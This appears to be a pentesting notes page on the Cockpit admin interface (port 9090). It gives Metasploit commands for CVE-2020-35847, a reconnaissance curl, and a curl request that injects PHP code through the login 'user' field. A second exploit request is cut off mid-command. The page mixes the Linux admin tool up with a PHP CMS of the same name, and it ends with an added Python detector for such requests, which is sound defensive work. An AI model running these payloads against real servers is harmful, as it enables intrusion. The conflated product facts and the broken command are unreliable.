Cockpit is an interactive server admin interface. It is easy to use and very lightweight. Cockpit interacts directly with the operating system from a real Linux session in a browser.

Port: 9090

Github

# Reset password (CVE-2020-35847)
msf> use exploit/multi/cockpit_cms_rce
msf> set USER admin
msf> run

# Find the server info - search for string
curl http://IP_ADDRESS:9090/ -o out.txt
cat out.txt | grep "var environment"

Known Exploits

curl -X POST https://example.com/auth/check -H 'User-Agent: Mozilla/5.0' -H 'Content-Type: application/json; charset=UTF-8' -H 'Origin: https://example.com' -d '{"auth":{"user":"test'\'';phpinfo();'\''","password":"b"}}'

curl -kL -X POST https://example.com/auth/requestreset -H 'User-Agent: Mozilla/5.0' -H 'Content-Type: application/json; charset=UTF-8' -H 'Origin: https://example.com' -d '{&
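
For detection, the requests under Known Exploits can be recognised by what they put in the `user` field of a JSON POST to `/auth/check` or `/auth/requestreset`. The following is an added example, not code from this page or from the Cockpit project: `inspect_auth_request` and `user_fields` are hypothetical names, it assumes the request body is available to the check (for example at a reverse proxy), and the top-level `user` field for `/auth/requestreset` is an assumption because that request is cut off on the page.

```python
import json
import re

# Endpoints named in the requests on this page.
AUTH_PATHS = {"/auth/check", "/auth/requestreset"}

# Characters a username has no need for; the page's payload uses a quote,
# ';' and '(' to break out of a string into PHP code.
SUSPICIOUS = re.compile(r"""['"`;(){}$\\]""")


def user_fields(data):
    """Yield (name, value) for each 'user' field in the parsed body."""
    if not isinstance(data, dict):
        return
    if "user" in data:  # assumed layout for /auth/requestreset
        yield "user", data["user"]
    auth = data.get("auth")
    if isinstance(auth, dict) and "user" in auth:  # layout shown for /auth/check
        yield "auth.user", auth["user"]


def inspect_auth_request(method, path, body):
    """Return a list of findings for one request; an empty list means clean."""
    if method.upper() != "POST" or path.split("?")[0].rstrip("/") not in AUTH_PATHS:
        return []
    try:
        data = json.loads(body)
    except (TypeError, ValueError):
        return ["body is not valid JSON"]
    findings = []
    for name, value in user_fields(data):
        if not isinstance(value, str):
            # A username should be a plain string, never an object or array.
            findings.append(f"{name}: expected string, got {type(value).__name__}")
        elif SUSPICIOUS.search(value):
            findings.append(f"{name}: code-like characters in {value!r}")
    return findings


# Constructed sample requests; the second body is the payload shown on this page.
SAMPLES = [
    ("POST", "/auth/check", '{"auth":{"user":"alice","password":"b"}}'),
    ("POST", "/auth/check", '{"auth":{"user":"test\';phpinfo();\'","password":"b"}}'),
    ("POST", "/auth/requestreset", '{"user":{"k":"v"}}'),
]

if __name__ == "__main__":
    for method, path, body in SAMPLES:
        print(path, inspect_auth_request(method, path, body) or "clean")
```

The same two rules (string type only, restricted character set) also work as server-side input validation in front of the login and reset handlers.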